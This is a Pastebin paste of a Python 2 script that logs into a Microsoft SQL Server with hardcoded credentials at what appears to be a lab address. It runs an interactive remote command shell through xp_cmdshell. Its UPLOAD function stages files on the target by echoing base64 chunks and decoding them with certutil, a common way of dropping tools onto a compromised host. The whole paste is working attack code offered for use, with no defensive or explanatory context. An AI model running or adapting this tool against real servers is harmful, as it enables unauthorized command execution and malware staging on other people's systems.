SHARE
TWEET

MSSQL Shell Uploading with Config

Kashmiri_Cheetah Sep 3rd, 2018 265 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. from __future__ import print_function
  3.  
  4. # Author: Alamot
  5. # Use pymssql >= 1.0.3 (otherwise it doesn't work correctly)
  6. # To upload a file type: UPLOAD local_path remote_path
  7. # e.g. UPLOAD myfile.txt C:\temp\myfile.txt
  8. # If you omit the remote_path it uploads the file on the current working folder.
  9.  
  10. import _mssql
  11. import base64
  12. import shlex
  13. import sys
  14. import tqdm
  15. import hashlib
  16.  
  17. MSSQL_SERVER="10.13.38.11"
  18. MSSQL_USERNAME = "sa_user"
  19. MSSQL_PASSWORD = "**********"
  20. BUFFER_SIZE = 5*1024
  21. TIMEOUT = 30
  22.  
  23.  
  24. def process_result(mssql):
  25.     username = ""
  26.     computername = ""
  27.     cwd = ""
  28.     rows = list(mssql)
  29.     for row in rows[:-3]:
  30.         columns = row.keys()
  31.         print(row[columns[-1]])
  32.     if len(rows) >= 3:
  33.         (username, computername) = rows[-3][rows[-3].keys()[-1]].split('|')
  34.         cwd = rows[-2][rows[-3].keys()[-1]]
  35.     return (username.rstrip(), computername.rstrip(), cwd.rstrip())
  36.  
  37.  
  38. def upload(mssql, stored_cwd, local_path, remote_path):
  39.     print("Uploading "+local_path+" to "+remote_path)
  40.     cmd = 'type nul > "' + remote_path + '.b64"'
  41.     mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
  42.  
  43.     with open(local_path, 'rb') as f:
  44.         data = f.read()
  45.         md5sum = hashlib.md5(data).hexdigest()
  46.         b64enc_data = "".join(base64.encodestring(data).split())
  47.        
  48.     print("Data length (b64-encoded): "+str(len(b64enc_data)/1024)+"KB")
  49.     for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE/1024, unit="KB"):
  50.         cmd = 'echo '+b64enc_data[i:i+BUFFER_SIZE]+' >> "' + remote_path + '.b64"'
  51.         mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
  52.         #print("Remaining: "+str(len(b64enc_data)-i))
  53.  
  54.     cmd = 'certutil -decode "' + remote_path + '.b64" "' + remote_path + '"'
  55.     mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
  56.     process_result(mssql)
  57.     cmd = 'certutil -hashfile "' + remote_path + '" MD5'
  58.     mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
  59.     if md5sum in [row[row.keys()[-1]].strip() for row in mssql if row[row.keys()[-1]]]:
  60.         print("MD5 hashes match: " + md5sum)
  61.     else:
  62.         print("ERROR! MD5 hashes do NOT match!")
  63.  
  64.  
  65. def shell():
  66.     mssql = None
  67.     stored_cwd = None
  68.     try:
  69.         mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
  70.         print("Successful login: "+MSSQL_USERNAME+"@"+MSSQL_SERVER)
  71.  
  72.         cmd = 'echo %username%^|%COMPUTERNAME% & cd'
  73.         mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
  74.         (username, computername, cwd) = process_result(mssql)
  75.         stored_cwd = cwd
  76.        
  77.         while True:
  78.             cmd = raw_input("CMD "+username+"@"+computername+" "+cwd+"> ").rstrip("\n")
  79.             if cmd.lower()[0:4] == "exit":
  80.                 mssql.close()
  81.                 return
  82.             elif cmd[0:6] == "UPLOAD":
  83.                 upload_cmd = shlex.split(cmd, posix=False)
  84.                 if len(upload_cmd) < 3:
  85.                     upload(mssql, stored_cwd, upload_cmd[1], stored_cwd+"\\"+upload_cmd[1])
  86.                 else:
  87.                     upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2])
  88.                 cmd = "echo *** UPLOAD PROCEDURE FINISHED ***"
  89.             mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
  90.             (username, computername, cwd) = process_result(mssql)
  91.             stored_cwd = cwd
  92.            
  93.     except _mssql.MssqlDatabaseException as e:
  94.         if  e.severity <= 16:
  95.             print("MSSQL failed: "+str(e))
  96.         else:
  97.             raise
  98.     finally:
  99.         if mssql:
  100.             mssql.close()
  101.  
  102.  
  103. shell()
  104. sys.exit()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top